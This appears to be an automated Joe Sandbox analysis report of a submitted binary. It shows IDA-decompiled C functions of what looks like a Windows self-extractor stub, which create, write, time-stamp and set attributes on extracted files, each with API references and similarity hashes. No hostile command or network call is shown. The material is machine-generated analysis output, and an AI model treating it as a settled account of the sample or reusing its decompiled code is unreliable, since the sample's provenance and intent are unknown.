                                                                                                                                                                                                                                            						_t69 =  &(_t74[1]);
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t46 =  *_t74;
                                                                                                                                                                                                                                            							_t74 =  &(_t74[1]);
                                                                                                                                                                                                                                            							__eflags = _t46;
                                                                                                                                                                                                                                            						} while (_t46 != 0);
                                                                                                                                                                                                                                            						_t73 = _t74 - _t69;
                                                                                                                                                                                                                                            						_t30 = _t64 + 1 + _t74 - _t69;
                                                                                                                                                                                                                                            						__eflags = _t30 - 0x104;
                                                                                                                                                                                                                                            						if(_t30 >= 0x104) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t69 = 0x3291e4;
                                                                                                                                                                                                                                            						_t30 = E00324702( &_v268, 0x3291e4,  *(_t75 + 4));
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                                                                                                                                                                                            						_t30 = E00324C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						E00324B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                                                                                                                                                                                            						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                                                                                                                                                                                            						__eflags = _t50;
                                                                                                                                                                                                                                            						if(_t50 != 0) {
                                                                                                                                                                                                                                            							_t51 = _t50 & 0x00000027;
                                                                                                                                                                                                                                            							__eflags = _t51;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t51 = 0x80;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t33 = 1;
                                                                                                                                                                                                                                            							goto L35;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t30 = _t44 - 1;
                                                                                                                                                                                                                                            					__eflags = _t30;
                                                                                                                                                                                                                                            					if(_t30 == 0) {
                                                                                                                                                                                                                                            						goto L3;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L9;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_a4 == 3) {
                                                                                                                                                                                                                                            					_t30 = E00324B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				goto L3;
                                                                                                                                                                                                                                            			}
                                                                                                                                                                                                                                            0x00324dff
                                                                                                                                                                                                                                            0x00324e03
                                                                                                                                                                                                                                            0x00324e08
                                                                                                                                                                                                                                            0x00324e0a
                                                                                                                                                                                                                                            0x00324e0f
                                                                                                                                                                                                                                            0x00324d03
                                                                                                                                                                                                                                            0x00324d03
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00324d03
                                                                                                                                                                                                                                            0x00324e18
                                                                                                                                                                                                                                            0x00324e20
                                                                                                                                                                                                                                            0x00324e25
                                                                                                                                                                                                                                            0x00324e27
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00324e33
                                                                                                                                                                                                                                            0x00324e38
                                                                                                                                                                                                                                            0x00324e3a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00324e40
                                                                                                                                                                                                                                            0x00324e51
                                                                                                                                                                                                                                            0x00324e56
                                                                                                                                                                                                                                            0x00324e5b
                                                                                                                                                                                                                                            0x00324e5e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00324e6a
                                                                                                                                                                                                                                            0x00324e6f
                                                                                                                                                                                                                                            0x00324e71
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00324e77
                                                                                                                                                                                                                                            0x00324e7d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00324e7d
                                                                                                                                                                                                                                            0x00324d25
                                                                                                                                                                                                                                            0x00324d25
                                                                                                                                                                                                                                            0x00324d28
                                                                                                                                                                                                                                            0x00324d36
                                                                                                                                                                                                                                            0x00324d3b
                                                                                                                                                                                                                                            0x00324d40
                                                                                                                                                                                                                                            0x00324d40
                                                                                                                                                                                                                                            0x00324d42
                                                                                                                                                                                                                                            0x00324d43
                                                                                                                                                                                                                                            0x00324d43
                                                                                                                                                                                                                                            0x00324d47
                                                                                                                                                                                                                                            0x00324d4a
                                                                                                                                                                                                                                            0x00324d4a
                                                                                                                                                                                                                                            0x00324d4c
                                                                                                                                                                                                                                            0x00324d4f
                                                                                                                                                                                                                                            0x00324d4f
                                                                                                                                                                                                                                            0x00324d51
                                                                                                                                                                                                                                            0x00324d52
                                                                                                                                                                                                                                            0x00324d52
                                                                                                                                                                                                                                            0x00324d56
                                                                                                                                                                                                                                            0x00324d5b
                                                                                                                                                                                                                                            0x00324d5d
                                                                                                                                                                                                                                            0x00324d62
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00324d67
                                                                                                                                                                                                                                            0x00324d6f
                                                                                                                                                                                                                                            0x00324d74
                                                                                                                                                                                                                                            0x00324d76
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00324d7c
                                                                                                                                                                                                                                            0x00324d84
                                                                                                                                                                                                                                            0x00324d89
                                                                                                                                                                                                                                            0x00324d8b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00324d94
                                                                                                                                                                                                                                            0x00324d99
                                                                                                                                                                                                                                            0x00324d9e
                                                                                                                                                                                                                                            0x00324da1
                                                                                                                                                                                                                                            0x00324daa
                                                                                                                                                                                                                                            0x00324daa
                                                                                                                                                                                                                                            0x00324da3
                                                                                                                                                                                                                                            0x00324da3
                                                                                                                                                                                                                                            0x00324da3
                                                                                                                                                                                                                                            0x00324db5
                                                                                                                                                                                                                                            0x00324dbb
                                                                                                                                                                                                                                            0x00324dbd
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00324dc3
                                                                                                                                                                                                                                            0x00324dc5
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00324dc5
                                                                                                                                                                                                                                            0x00324dbd
                                                                                                                                                                                                                                            0x00324d2a
                                                                                                                                                                                                                                            0x00324d2a
                                                                                                                                                                                                                                            0x00324d2d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00324d2d
                                                                                                                                                                                                                                            0x00324cf8
                                                                                                                                                                                                                                            0x00324cfd
                                                                                                                                                                                                                                            0x00324d02
                                                                                                                                                                                                                                            0x00000000

APIs
• SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00324DB5
• SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00324DDD
Strings
Memory Dump Source
• Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
Similarity
• API ID: AttributesFileItemText
• String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
• API String ID: 3625706803-1116576409
• Opcode ID: 1ab396851e1e3560226d777fc9a50dcd5eab203f0bb14f7a8755e8e5acb8efde
• Instruction ID: c1a18a4a55ca088edb636ebf2a0811ccb27cb3292741f6506c705ab9ad457d1a
• Opcode Fuzzy Hash: 1ab396851e1e3560226d777fc9a50dcd5eab203f0bb14f7a8755e8e5acb8efde
• Instruction Fuzzy Hash: 8E4146362041219BCB339F38FC446B573A9EB45300F058669D8969B692DB71DE46CB90
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00324C37(signed int __ecx, int __edx, int _a4) {
                                                                                                                                                                                                                                            				struct _FILETIME _v12;
                                                                                                                                                                                                                                            				struct _FILETIME _v20;
                                                                                                                                                                                                                                            				FILETIME* _t14;
                                                                                                                                                                                                                                            				int _t15;
                                                                                                                                                                                                                                            				signed int _t21;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t21 = __ecx * 0x18;
                                                                                                                                                                                                                                            				if( *((intOrPtr*)(_t21 + 0x328d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t14 =  &_v12;
                                                                                                                                                                                                                                            					_t15 = SetFileTime( *(_t21 + 0x328d74), _t14, _t14, _t14); // executed
                                                                                                                                                                                                                                            					if(_t15 == 0) {
                                                                                                                                                                                                                                            						goto L5;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • DosDateTimeToFileTime.KERNEL32 ref: 00324C54
                                                                                                                                                                                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00324C66
                                                                                                                                                                                                                                            • SetFileTime.KERNELBASE(?,?,?,?), ref: 00324C7E
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Time$File$DateLocal
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2071732420-0
                                                                                                                                                                                                                                            • Opcode ID: d1d205e875b71bd0cb99a86578e97ee5da467a87397c957e081c2c8ff8a06095
                                                                                                                                                                                                                                            • Instruction ID: 491decde149513acd0a28c9048b501a6bedd00ca6134f0a0221d8f592194dee3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d1d205e875b71bd0cb99a86578e97ee5da467a87397c957e081c2c8ff8a06095
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F6F0907260122CBF9B27DFB9EC49DBB77ACEF04350B44452AF816C1050EA30E915D7A0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                                            			E0032487A(CHAR* __ecx, signed int __edx) {
                                                                                                                                                                                                                                            				void* _t7;
                                                                                                                                                                                                                                            				CHAR* _t11;
                                                                                                                                                                                                                                            				long _t18;
                                                                                                                                                                                                                                            				long _t23;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t11 = __ecx;
                                                                                                                                                                                                                                            				asm("sbb edi, edi");
                                                                                                                                                                                                                                            				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                                                                                                                                                                                            				if((__edx & 0x00000100) == 0) {
                                                                                                                                                                                                                                            					asm("sbb esi, esi");
                                                                                                                                                                                                                                            					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					if((__edx & 0x00000400) == 0) {
                                                                                                                                                                                                                                            						asm("sbb esi, esi");
                                                                                                                                                                                                                                            						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t23 = 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                                                                                                                                                                                            				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                                                                                                                                                                                            					return _t7;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					E0032490C(_t11);
                                                                                                                                                                                                                                            					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00324A23,?,00324F67,*MEMCAB,00008000,00000180), ref: 003248DE
                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00324F67,*MEMCAB,00008000,00000180), ref: 00324902
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                                                            • Opcode ID: 183792accb927ea73db27dba3a630543c4d27d089e165008cf1687f86712c25c
                                                                                                                                                                                                                                            • Instruction ID: c0c6e77c7911046101036b0205da385850ddc10d5a05dacff458bde6e12f4d38
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 183792accb927ea73db27dba3a630543c4d27d089e165008cf1687f86712c25c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E6014BB3E2157026F3264129AC88FB7551CCB9A734F1B1334BDAAE71D1D6655C0481E0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E00324AD0(signed int _a4, void* _a8, long _a12) {
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				int _t12;
                                                                                                                                                                                                                                            				signed int _t14;
                                                                                                                                                                                                                                            				signed int _t15;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				struct HWND__* _t21;
                                                                                                                                                                                                                                            				signed int _t24;
                                                                                                                                                                                                                                            				signed int _t25;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t20 =  *0x32858c; // 0x270
                                                                                                                                                                                                                                            				_t9 = E00323680(_t20);
                                                                                                                                                                                                                                            				if( *0x3291d8 == 0) {
                                                                                                                                                                                                                                            					_push(_t24);
                                                                                                                                                                                                                                            					_t12 = WriteFile( *(0x328d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                                                                                                                                                                                            					if(_t12 != 0) {
                                                                                                                                                                                                                                            						_t25 = _a12;
                                                                                                                                                                                                                                            						if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                            							_t14 =  *0x329400; // 0x89c00
                                                                                                                                                                                                                                            							_t15 = _t14 + _t25;
                                                                                                                                                                                                                                            							 *0x329400 = _t15;
                                                                                                                                                                                                                                            							if( *0x328184 != 0) {
                                                                                                                                                                                                                                            								_t21 =  *0x328584; // 0x0
                                                                                                                                                                                                                                            								if(_t21 != 0) {
                                                                                                                                                                                                                                            									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x3293f8, 0);
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t25 = _t24 | 0xffffffff;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					return _t25;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					return _t9 | 0xffffffff;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00323680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0032369F
                                                                                                                                                                                                                                              • Part of subcall function 00323680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 003236B2
                                                                                                                                                                                                                                              • Part of subcall function 00323680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 003236DA
                                                                                                                                                                                                                                            • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00324B05
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1084409-0
                                                                                                                                                                                                                                            • Opcode ID: d198bc1bfcbf76996e94e8d607b7c48e69d72eb8a9eccfeb012f5cb38619cc6e
                                                                                                                                                                                                                                            • Instruction ID: 83078d9a2cb9835cddd97479e8b5570e667e45834ff48906b95f08917238d3c8
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d198bc1bfcbf76996e94e8d607b7c48e69d72eb8a9eccfeb012f5cb38619cc6e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D601CC31200214ABDB268F29FC05BA2775DEB44725F15822AF9399B1E0CB30E816CB80
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E0032658A(char* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                                                            				intOrPtr _t4;
                                                                                                                                                                                                                                            				char* _t6;
                                                                                                                                                                                                                                            				char* _t8;
                                                                                                                                                                                                                                            				void* _t10;
                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                            				char* _t16;
                                                                                                                                                                                                                                            				intOrPtr* _t17;
                                                                                                                                                                                                                                            				void* _t18;
                                                                                                                                                                                                                                            				char* _t19;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t16 = __ecx;
                                                                                                                                                                                                                                            				_t10 = __edx;
                                                                                                                                                                                                                                            				_t17 = __ecx;
                                                                                                                                                                                                                                            				_t1 = _t17 + 1; // 0x328b3f
                                                                                                                                                                                                                                            				_t12 = _t1;
                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                            					_t4 =  *_t17;
                                                                                                                                                                                                                                            					_t17 = _t17 + 1;
                                                                                                                                                                                                                                            				} while (_t4 != 0);
                                                                                                                                                                                                                                            				_t18 = _t17 - _t12;
                                                                                                                                                                                                                                            				_t2 = _t18 + 1; // 0x328b40
                                                                                                                                                                                                                                            				if(_t2 < __edx) {
                                                                                                                                                                                                                                            					_t19 = _t18 + __ecx;
                                                                                                                                                                                                                                            					if(_t19 > __ecx) {
                                                                                                                                                                                                                                            						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                                                                                                                                                                                            						if( *_t8 != 0x5c) {
                                                                                                                                                                                                                                            							 *_t19 = 0x5c;
                                                                                                                                                                                                                                            							_t19 =  &(_t19[1]);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t6 = _a4;
                                                                                                                                                                                                                                            					 *_t19 = 0;
                                                                                                                                                                                                                                            					while( *_t6 == 0x20) {
                                                                                                                                                                                                                                            						_t6 = _t6 + 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					return E003216B3(_t16, _t10, _t6);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return 0x8007007a;
                                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CharPrevA.USER32(00328B3E,00328B3F,00000001,00328B3E,-00000003,?,003260EC,00321140,?), ref: 003265BA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CharPrev
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 122130370-0
                                                                                                                                                                                                                                            • Opcode ID: 35b65fda8d7a9ee8757a5f4f25833e44aa118338c48c3b6dd0fde8444713fa4f
                                                                                                                                                                                                                                            • Instruction ID: e7d2d2f0468cf17ad35f5b68d727447af6de389c3967c7e90ee29212de486365
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 35b65fda8d7a9ee8757a5f4f25833e44aa118338c48c3b6dd0fde8444713fa4f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F4F04C321042709BD333091DB885B6BBFDE9F8B350F39016EE8DAC3209CA659C4683E4
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E0032621E() {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				signed int _t5;
                                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                                            				void* _t19;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				signed int _t21;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t5 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_v8 = _t5 ^ _t21;
                                                                                                                                                                                                                                            				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                            					0x4f0 = 2;
                                                                                                                                                                                                                                            					_t9 = E0032597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					E003244B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                                                            					 *0x329124 = E00326285();
                                                                                                                                                                                                                                            					_t9 = 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00326CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0032623F
                                                                                                                                                                                                                                              • Part of subcall function 003244B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00324518
                                                                                                                                                                                                                                              • Part of subcall function 003244B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00324554
                                                                                                                                                                                                                                              • Part of subcall function 00326285: GetLastError.KERNEL32(00325BBC), ref: 00326285
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 381621628-0
                                                                                                                                                                                                                                            • Opcode ID: 5c9cf55b7ee0797b7593eb3c837db4df4b7ec055027ef77cb0f38e3aadeddfff
                                                                                                                                                                                                                                            • Instruction ID: e290b37e8b0bfb02869d20791ac5bc5fbbf78e72a146352d5afc3d728408d21c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5c9cf55b7ee0797b7593eb3c837db4df4b7ec055027ef77cb0f38e3aadeddfff
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 14F0E9B0704318ABD762FB74AD03FBE33BCDF44700F40446AB985DA081DD749D458650
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00324B60(signed int _a4) {
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				signed int _t15;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t15 = _a4 * 0x18;
                                                                                                                                                                                                                                            				if( *((intOrPtr*)(_t15 + 0x328d64)) != 1) {
                                                                                                                                                                                                                                            					_t9 = FindCloseChangeNotification( *(_t15 + 0x328d74)); // executed
                                                                                                                                                                                                                                            					if(_t9 == 0) {
                                                                                                                                                                                                                                            						return _t9 | 0xffffffff;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t15 + 0x328d60)) = 1;
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t15 + 0x328d60)) = 1;
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t15 + 0x328d68)) = 0;
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t15 + 0x328d70)) = 0;
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t15 + 0x328d6c)) = 0;
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00324FA1,00000000), ref: 00324B98
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
